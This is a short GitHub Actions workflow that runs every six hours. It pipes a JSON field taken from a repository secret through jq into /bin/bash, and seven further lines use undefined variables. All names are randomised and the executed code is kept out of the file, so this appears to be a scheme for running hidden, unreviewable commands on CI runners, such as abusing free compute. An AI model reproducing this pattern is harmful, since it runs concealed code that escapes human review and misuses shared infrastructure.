name: yuumbrella
on:
  workflow_dispatch:
  schedule:
    - cron: '57 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yuumbrella
        env:
          fcp15120: ${{ secrets.fcp15120 }}
        run: |
          echo $fcp15120 | jq -r .qnaze40318 | /bin/bash
          echo $o20392 | jq -r .hs3 | /bin/bash
          echo $rsuwj91688 | jq -r .b3231 | /bin/bash
          echo $ttksq5 | jq -r .pey93359 | /bin/bash
          echo $nlgv8 | jq -r .xn8 | /bin/bash
          echo $ze998 | jq -r .kvy071 | /bin/bash
          echo $v180 | jq -r .blzc53464 | /bin/bash
          echo $ncpyd09 | jq -r .g9 | /bin/bash

